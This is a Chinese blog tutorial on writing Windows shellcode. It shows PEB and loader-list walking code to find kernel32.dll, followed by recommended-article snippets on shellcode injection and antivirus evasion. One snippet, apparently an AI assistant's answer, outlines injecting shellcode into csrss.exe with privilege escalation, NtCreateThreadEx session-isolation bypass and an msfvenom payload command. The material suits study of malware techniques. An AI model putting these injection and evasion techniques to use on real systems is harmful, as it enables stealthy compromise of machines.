注入shellcode

最新推荐文章于 2023-12-29 14:29:33 发布
原创 最新推荐文章于 2023-12-29 14:29:33 发布 · 1.3k 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。

 

 

shellcode 是能够放在任何地方都能够执行机器码

2.编写shellcode原则

一:不能有全局变量

二:不能调用系统函数

三:不能嵌套调用函数

3.编写shellcode实战

一:shellcode分为基本模块和功能模块,结构如下图:

FS:[0]是TEB

从FS:[0X30]对应peb,偏移找到当前线程的dll模块链表,找到模块基地址,

利用pe导出表知识,自己找导出表找到 函数GetProcAddress 和LoadLibrary就可以找到任何函数了

未完待续...

PEB结构

0: kd> dt _PEB
nt_400000!_PEB
   +0x000 InheritedAddressSpace : UChar
   +0x001 ReadImageFileExecOptions : UChar
   +0x002 BeingDebugged    : UChar
   +0x003 SpareBool        : UChar
   +0x004 Mutant           : Ptr32 Void
   +0x008 ImageBaseAddress : Ptr32 Void
   +0x00c Ldr              : Ptr32 _PEB_LDR_DATA
   +0x010 ProcessParameters : Ptr32 _RTL_USER_PROCESS_PARAMETERS
   +0x014 SubSystemData    : Ptr32 Void
   +0x018 ProcessHeap      : Ptr32 Void
   +0x01c FastPebLock      : Ptr32 _RTL_CRITICAL_SECTION
   +0x020 FastPebLockRoutine : Ptr32 Void
   +0x024 FastPebUnlockRoutine : Ptr32 Void
   +0x028 EnvironmentUpdateCount : Uint4B
   +0x02c KernelCallbackTable : Ptr32 Void
   +0x030 SystemReserved   : [1] Uint4B
   +0x034 AtlThunkSListPtr32 : Uint4B
   +0x038 FreeList         : Ptr32 _PEB_FREE_BLOCK
   +0x03c TlsExpansionCounter : Uint4B
   +0x040 TlsBitmap        : Ptr32 Void
   +0x044 TlsBitmapBits    : [2] Uint4B
   +0x04c ReadOnlySharedMemoryBase : Ptr32 Void
   +0x050 ReadOnlySharedMemoryHeap : Ptr32 Void
   +0x054 ReadOnlyStaticServerData : Ptr32 Ptr32 Void
   +0x058 AnsiCodePageData : Ptr32 Void
   +0x05c OemCodePageData  : Ptr32 Void
   +0x060 UnicodeCaseTableData : Ptr32 Void
   +0x064 NumberOfProcessors : Uint4B
   +0x068 NtGlobalFlag     : Uint4B
   +0x070 CriticalSectionTimeout : _LARGE_INTEGER
   +0x078 HeapSegmentReserve : Uint4B
   +0x07c HeapSegmentCommit : Uint4B
   +0x080 HeapDeCommitTotalFreeThreshold : Uint4B
   +0x084 HeapDeCommitFreeBlockThreshold : Uint4B
   +0x088 NumberOfHeaps    : Uint4B
   +0x08c MaximumNumberOfHeaps : Uint4B
   +0x090 ProcessHeaps     : Ptr32 Ptr32 Void
   +0x094 GdiSharedHandleTable : Ptr32 Void
   +0x098 ProcessStarterHelper : Ptr32 Void
   +0x09c GdiDCAttributeList : Uint4B
   +0x0a0 LoaderLock       : Ptr32 Void
   +0x0a4 OSMajorVersion   : Uint4B
   +0x0a8 OSMinorVersion   : Uint4B
   +0x0ac OSBuildNumber    : Uint2B
   +0x0ae OSCSDVersion     : Uint2B
   +0x0b0 OSPlatformId     : Uint4B
   +0x0b4 ImageSubsystem   : Uint4B
   +0x0b8 ImageSubsystemMajorVersion : Uint4B
   +0x0bc ImageSubsystemMinorVersion : Uint4B
   +0x0c0 ImageProcessAffinityMask : Uint4B
   +0x0c4 GdiHandleBuffer  : [34] Uint4B
   +0x14c PostProcessInitRoutine : Ptr32     void 
   +0x150 TlsExpansionBitmap : Ptr32 Void
   +0x154 TlsExpansionBitmapBits : [32] Uint4B
   +0x1d4 SessionId        : Uint4B
   +0x1d8 AppCompatFlags   : _ULARGE_INTEGER
   +0x1e0 AppCompatFlagsUser : _ULARGE_INTEGER
   +0x1e8 pShimData        : Ptr32 Void
   +0x1ec AppCompatInfo    : Ptr32 Void
   +0x1f0 CSDVersion       : _UNICODE_STRING
   +0x1f8 ActivationContextData : Ptr32 Void
   +0x1fc ProcessAssemblyStorageMap : Ptr32 Void
   +0x200 SystemDefaultActivationContextData : Ptr32 Void
   +0x204 SystemAssemblyStorageMap : Ptr32 Void
   +0x208 MinimumStackCommit : Uint4B

peb的0xc位置找到_PEB_LDR_DATA

PEB_LDR_DATA结构

0: kd> dt _PEB_LDR_DATA
nt_400000!_PEB_LDR_DATA
   +0x000 Length           : Uint4B
   +0x004 Initialized      : UChar
   +0x008 SsHandle         : Ptr32 Void
   +0x00c InLoadOrderModuleList : _LIST_ENTRY
   +0x014 InMemoryOrderModuleList : _LIST_ENTRY
   +0x01c InInitializationOrderModuleList : _LIST_ENTRY
   +0x024 EntryInProgress  : Ptr32 Void
TA; // +0x24

这个结构体有三个链表

   +0x00c InLoadOrderModuleList : _LIST_ENTRY
   +0x014 InMemoryOrderModuleList : _LIST_ENTRY
   +0x01c InInitializationOrderModuleList : _LIST_ENTRY

遍历链表即可找到dll

 

LDR_DATA_TABLE_ENTRY 结构

typedef struct _LDR_DATA_TABLE_ENTRY  
{  
    LIST_ENTRY InLoadOrderLinks;  
    LIST_ENTRY InMemoryOrderLinks;  
    LIST_ENTRY InInitializationOrderLinks;  
    PVOID DllBase;  
    PVOID EntryPoint;  
    DWORD SizeOfImage;  
    UNICODE_STRING FullDllName;  
    UNICODE_STRING BaseDllName;  
    DWORD Flags;  
    WORD LoadCount;  
    WORD TlsIndex;  
    LIST_ENTRY HashLinks;  
    PVOID SectionPointer;  
    DWORD CheckSum;  
    DWORD TimeDateStamp;  
    PVOID LoadedImports;  
    PVOID EntryPointActivationContext;  
    PVOID PatchInformation;  
}LDR_DATA_TABLE_ENTRY,*PLDR_DATA_TABLE_ENTRY;

通过此结构体可根据BaseDllName获得DllBase,

接下来用到pe知识,找到pe文件导出表,查导出表找到函数。

如 loadLibray getProcess 找到后可以任意运行函数。难点在于怎么找到导入表。

 

获取模块的基址代码

void _getModuleBaseAddr()
{
    void *PEB = NULL,
        *Ldr = NULL,
        *Flink = NULL,
        *p = NULL,
        *BaseAddress = NULL,
        *FullDllName = NULL;

    __asm
    {
        mov eax, fs:[0x30]
        mov PEB, eax
    }
    Ldr = (PVOID)*((PDWORD)((DWORD)PEB + 0x0c));
    Flink = (PVOID)*((PDWORD)((DWORD)Ldr + 0x14));
    p = Flink;
    do
    {
        BaseAddress = (PVOID)*((PDWORD)((DWORD)p + 0x10));
        FullDllName = (PVOID)*((PDWORD)((DWORD)p + 0x20));
        wprintf(L"FullDllName is %s\n", FullDllName);
        printf("BaseAddress is %x\n", BaseAddress);
        p = (PVOID)*((PDWORD)p);
    } while (Flink != p);
}

获取kener32.dll基址

DWORD kener32Base = 0;

	__asm
	{
		xor		ecx, ecx
		mov		ecx, dword ptr fs : [30h]
		mov		ecx, dword ptr[ecx + 0Ch]
		mov		esi, dword ptr[ecx + 1Ch]
		sc_goonKernel :
					  mov		eax, dword ptr[esi + 8]
					  mov		ebx, dword ptr[esi + 20h]
					  mov		esi, dword ptr[esi]
					  cmp		dword ptr[ebx + 0Ch], 00320033h; 判断名称中字符32的unicode
					  jnz		sc_goonKernel
					  mov		ebx, eax; 获取kernel32地址
					  mov		kener32Base, ebx

	}

 

 

免杀技术(高级中的基础手法)之PE扩大节注入ShellCode
盾悟
10-08 1万+
本文详细解析了PE文件免杀技术中的扩大节注入Shellcode方法。该技术通过修改PE结构,在扩展节中注入加密Shellcode,结合花指令混淆和反调试机制,提升隐蔽性。核心步骤包括:解析PE头结构、扩展/添加新节、注入加密Shellcode、设置入口点劫持及反调试功能。文章提供了完整的C语言实现代码示例,并指出该技术对传统杀软的绕过率可达50-80%,但对EDR效果有限。这种中等偏上的技术适合入门学习,但需注意合法使用。
ShellCode注入
南宫封清的博客
05-03 1596
注意点: 1. 不能有全局变量 2. 不能使用常量字符串 ,可以使用这种形式 szTitle = {'a', 'b', 'c', 0}; 3. 不能使用系统调用,比如不能直接使用MessageBox,因为生成的汇编是 Call [0xxxxxx],这个0xxxxx是导入表的地址,注入的程序导入表地址不同而且导入表中不一定有这个函数,可以使用LoadLibrary配合GetProcAddres...
shellcode
WEB安全测试学习中……
03-09 1302
<br />Shellcode实际是一段代码(也可以是填充数据),是用来发送到服务器利用特定漏洞的代码,一般可以获取权限。<br />另外,Shellcode一般是作为数据发送给受攻击服务的。 <br />Shellcode是溢出程序和蠕虫病毒的核心,提到它自然就会和漏洞联想在一起,毕竟Shellcode只对没有打补丁的主机有用武之地。网络上数以万计带着漏洞顽强运行着的服务器给hacker和Vxer丰盛的晚餐。漏洞利用中最关键的是Shellcode的编写。由于漏洞发现者在漏洞发现之初并不会给出完整Shell
【2021.01.15】注入ShellCode
oalken的博客
01-15 846
什么是ShellCode? 不依赖环境,在任何地方都能执行的机器码(硬编码)。 ShellCode的编写原则 不能有全局变量。 不能使用常量字符串、 不能使用系统调用。 不能嵌套调用其他函数。 ShellCode的问题 由于第 3 点,所以不能直接使用函数,因为直接使用函数在编译时会产生导入表。而将代码复制到其他进程中,其他进程没有需要的导入表,所以会出问题。 那么该怎么解决这个问题呢? 可以不依赖任何导入表得到进程的TEB,其次,通过TEB找到PEB,再找到 3 个链表。 对链表进行遍
1.12 进程注入ShellCode套接字
优快云
09-01 5724
在笔者前几篇文章中我们一直在探讨如何利用`Metasploit`这个渗透工具生成`ShellCode`以及如何将ShellCode注入到特定进程内,本章我们将自己实现一个正向`ShellCode`Shell,当进程被注入后,则我们可以通过利用NC等工具连接到被注入进程内,并以对方的权限及身份执行命令,该功能有利于于Shell的隐藏。本章的内容其原理与`《运用C语言编写ShellCode代码》`中所使用的原理保持一致,通过动态定位到我们所需的网络通信函数并以此来构建一个正向Shell,本章节内容对`Metas
驱动开发:内核ShellCode线程注入
优快云
06-14 9194
还记得`《驱动开发:内核LoadLibrary实现DLL注入》`中所使用的注入技术吗,我们通过`RtlCreateUserThread`函数调用实现了注入DLL到应用层并执行,本章将继续探索一个简单的问题,如何注入`ShellCode`代码实现反弹Shell,这里需要注意一般情况下`RtlCreateUserThread`需要传入两个最重要的参数,一个是`StartAddress`开始执行的内存块,另一个是`StartParameter`传入内存块的变量列表,而如果将`StartParameter`地址填充
栈溢出攻击1——注入shellcode指令拿到shell
学习记录
09-15 2600
  在IDA的Function name这一栏里面,如下图所示,没有发现后门函数,说明这道题目需要自己写shellcode来拿到shell权限。 查看sub_80484E9函数的伪代码,如下所示。 int sub_80484E9() { char v1; // [esp+0h] [ebp-28h] puts("Could I know your name?"); myRead((int)&unk_804A060, 32); printf("Hi, %s.\n", &unk
精选资源
ElfWizard:将Shellcode注入ELF二进制文件的简单工具
02-21
**ElfWizard:Shellcode注入ELF二进制文件的简易工具** 在计算机安全领域,Shellcode是一种用机器语言编写的代码片段,通常用于利用软件漏洞执行任意代码。它可以直接在目标系统的内存中运行,绕过常规的安全机制。...
精选资源
UnModule_shellcode_Inject:无模块注入工程 VS2008
04-29
=====================ShellCodeFrame_x64 ===============...使用生成的shellcode对静态dll进行无模块注入 配置 x64 插入汇编的VS环境。 ==============ShellCodeFrame_x86 工程介绍=========== 生成x86平台的shellcod
SimpleShellcodeInjector:SimpleShellcodeInjector接收十六进制的shellcode作为参数并执行它。 它不会在第三方应用程序中注入shellcode
05-14
它不会将shellcode注入第三方应用程序中,并且对于诸如Get-InjectedThread之类的工具始终处于监视之下。 目前,即使您在不混淆的情况下执行了meterpreter的shellcode,许多防病毒解决方案也无法检测到它。 让我注意...
inject:将 shellcode 注入 x86 上的 ELF3264 二进制文件,并将入口点重定向到新代码
07-03
注入shellcode 注入 x86 上的 ELF32/64 二进制文件,并将入口点重定向到新代码。
远程线程注入工具,可生成代码 可自定义shellcode注入进程-易语言
06-14
程序界面,可自定义任意shellcode 注入任意进程 此程序自带将msf的远控shellcode转换成 易语言 可调用的shellcode 同时还可以将注入的功能生成出自己的程序可调用的代码 双击第三个输入框即可生成shellcode,这里默认的shellcode是远程线程注入 注入的是当前程序选择注入的进程 这里选择最左下角的选项,然后再双击输入框 即可生成在自身程序执行的shellcode 这里说明一下哈,这里是可以自定义shellcode进行注入的,并不是必须使用msf生成的shellcode进行注入 这里将自己扣出来的shellcode放在第一个输入框就行了,十进制的机器码之间以半角符逗号分隔开 生成的shellcode给自己的代码调用 记得要配合上 精易模块 进行使用 当然了 也可以自己手动补dll进去 以下为关键代码的截图 使用易语言好几年了,从最初的进厂打工(满心的无奈) 到现在的安全工程师,易语言是带我入门的语言 也是我至今最喜欢的语言之一 易语言对于我来说更多的是一种说不上来的感觉 对于我来说易语言是有生命的 也是易语言赐予了我入门这行的基础(很扎实很扎实) 此工具是前两天匆忙写出来的,如果有哪里做的不够好以及觉得此程序很烂的大佬们不要喷我 以下为下载地址 此程序使用了精易模块以及未闻花名的 皮肤模块
编写shellcode注入至进程
挖树
10-18 5322
shellcode 维基百科: 在计算机安全中,shellcode是一小段代码,可以用于软件漏洞利用的载荷。 被称为“shellcode”是因为它通常启动一个命令终端,攻击者可以通过这个终端控制受害的计算机,但是所有执行类似任务的代码片段都可以称作shellcode。 …… Shellcode通常是以机器码形式编写的。 去掉修饰词,shellcode就是一段机器码。 关于shellcode如何...
1.10 内存ShellCode注入与格式化
热门推荐
优快云
08-31 1万+
ShellCode 的格式化与注入功能在实战应用中也尤为重要,格式化`Shellcode`是指将其转换为可执行的二进制格式,使其能够在内存中运行。注入`Shellcode`是指将格式化的`Shellcode`注入到另一个进程的内存中,以便在该进程中执行,此类功能也可算作`ShellCode`技术的延申功能。
对抗无落地的shellcode注入
hongduilanjun的博客
07-21 2433
一般的shellcode加载到内存都是通过和来获取函数进行shellcode加载,亦或是通过远程申请一块空间来放入shellcode的地址进行加载。为了隐蔽,攻击者通常会通过PEB找到链表,自己去定位函数从而规避杀软对导入表的监控。攻击者先把shellcode加密,在写入时解密存放到内存空间,使用基于文件检测的方法,是无能为力的,那么这种无落地的方式,最终都会在内存中一览无余。...
C/C++ 将ShellCode注入进程内存
优快云
11-06 6628
内存注入ShellCode的优势就在于被发现的概率极低,甚至可以被忽略,这是因为ShellCode注入到进程内存中时,其并没有与之对应的硬盘文件,从而难以在磁盘中取证,但也存在一个弊端由于内存是易失性存储器,所以系统必须一直开机,不能关闭,该攻击手法可以应用于服务器上面,安全风险最小,注入后将注入器删除即可。
驱动ShellCode注入
qq_18811919的博客
12-29 906
【代码】驱动ShellCode注入
将shllcode注入Linux中正在运行的进程(C/C++代码实现)
chen1415886044的博客
07-30 1671
进程注入是一种在单独的活动进程的地址空间中执行任意代码的方法。在另一个进程的上下文中运行代码可以允许访问该进程的内存、系统/网络资源,以及可能提升的权限。通过进程注入执行也可能逃避安全产品的检测,因为在合法进程下执行是被掩盖的。 有许多不同的方法可以将代码注入进程,其中许多方法滥用合法功能。这些实现适用于每个主要的操作系统,但通常是特定于平台的。 更复杂的样本可以利用命名管道或其他进程间通信(IPC)机制作为通信信道来执行对分段模块的多个进程注入,并进一步逃避检测。
shellcode注入驱动
SHELLCODE_8BIT的博客
02-21 2219
避坑 | Windows驱动签名经验贴 - FreeBuf网络安全行业门户
向csrss.exe注入shellcode 例子
最新发布
05-29
<think>好的,用户需要查找关于向csrss.exe进程注入shellcode的技术示例或教程。首先,我得回想一下之前用户提供的引用内容,看看有没有相关的内容。在引用[1]中提到了三种注入方法:直接DLL注入、反射式DLL注入和镂空注入,其中反射式注入不会在模块列表中显示,这可能对用户有帮助。引用[2]是关于shellcode转内存马的,但可能不直接涉及csrss.exe。接下来,我需要分析csrss.exe的特殊性。csrss.exe是Windows的关键系统进程,负责处理客户端/服务器运行时子系统,注入到这种高权限进程需要更高的权限和绕过安全机制的方法。用户可能需要了解如何以SYSTEM权限运行注入器,以及如何绕过会话隔离,比如使用本地系统权限的进程来注入。然后,技术实现方面,用户可能需要具体的步骤,比如如何获取csrss.exe的进程句柄,如何分配内存和写入shellcode,以及如何创建远程线程。这里需要注意,传统的CreateRemoteThread可能无法在csrss.exe中使用,因为会话隔离的问题,可能需要使用更高级的注入技术,比如APC注入或者使用NtCreateThreadEx。另外,用户可能需要了解如何生成和加载shellcode,比如使用Metasploit的msfvenom生成,并通过反射加载的方式避免写入文件。同时,需要提醒用户注入到系统进程的风险,比如导致系统不稳定或触发安全软件检测。最后,生成相关问题时要考虑用户可能进一步询问的内容,比如如何提升权限、绕过会话隔离的具体方法、其他注入技术比较以及检测和防御措施。这些相关问题可以帮助用户深入理解该主题。</think>向`csrss.exe`进程注入shellcode属于高级系统级代码注入技术,需特别注意Windows会话隔离机制和权限问题。以下是技术要点和示例框架: --- ### 技术原理 1. **会话隔离机制** `csrss.exe`属于Windows系统核心进程,每个会话(Session 0/1)有独立实例。注入需**跨会话权限**,通常要求注入程序以`SYSTEM`权限运行并通过`ZwCreateThreadEx`创建线程[^1]。 2. **权限提升** 需通过工具或代码获取`SeDebugPrivilege`权限: ```c if (OpenProcessToken(GetCurrentProcess(), TOKEN_ADJUST_PRIVILEGES, &hToken)) { LookupPrivilegeValue(NULL, SE_DEBUG_NAME, &luid); AdjustTokenPrivileges(hToken, FALSE, &tp, 0, NULL, NULL); } ``` 3. **注入方法选择** 传统`CreateRemoteThread`在`csrss.exe`中受限,建议使用: - APC队列注入(需目标线程处于可警报状态) - 内存镂空(Hollowing)替换合法模块代码 - 反射式DLL注入(无模块列表特征) --- ### 示例代码框架(C/C++) ```c // 获取csrss.exe进程ID DWORD pid = FindProcessId(L"csrss.exe"); // 以PROCESS_ALL_ACCESS权限打开进程 HANDLE hProcess = OpenProcess(PROCESS_ALL_ACCESS, FALSE, pid); // 在目标进程分配内存 LPVOID remoteMem = VirtualAllocEx(hProcess, NULL, shellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE); // 写入shellcode WriteProcessMemory(hProcess, remoteMem, shellcode, shellcodeSize, NULL); // 创建远程线程(需绕过会话检查) HANDLE hThread = CreateRemoteThread(hProcess, NULL, 0, (LPTHREAD_START_ROUTINE)remoteMem, NULL, CREATE_SUSPENDED, NULL); // 修复线程上下文并执行 ResumeThread(hThread); ``` --- ### 关键难点 1. **会话隔离绕过** 需使用`NtCreateThreadEx`并设置`Flag=0x1C`(绕过Win32k限制)[^2]: ```c typedef NTSTATUS(WINAPI* pNtCreateThreadEx)(HANDLE*, ACCESS_MASK, void*, HANDLE, LPTHREAD_START_ROUTINE, LPVOID, BOOL, SIZE_T, SIZE_T, SIZE_T, void*); pNtCreateThreadEx NtCreateThreadEx = (pNtCreateThreadEx)GetProcAddress(GetModuleHandle(L"ntdll.dll"), "NtCreateThreadEx"); NtCreateThreadEx(&hThread, 0x1FFFFF, NULL, hProcess, remoteMem, NULL, FALSE, 0x1C, 0, 0, NULL); ``` 2. **Shellcode生成** 使用Metasploit生成无文件特征payload: ```bash msfvenom -p windows/x64/exec CMD="calc.exe" -f raw -o shellcode.bin ``` --- ### 防御与检测 - 监控`csrss.exe`的非Microsoft签名模块 - 检查进程内存中的可执行页是否包含异常API调用链 - 使用ETW(Event Tracing for Windows)跟踪线程创建事件 ---
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值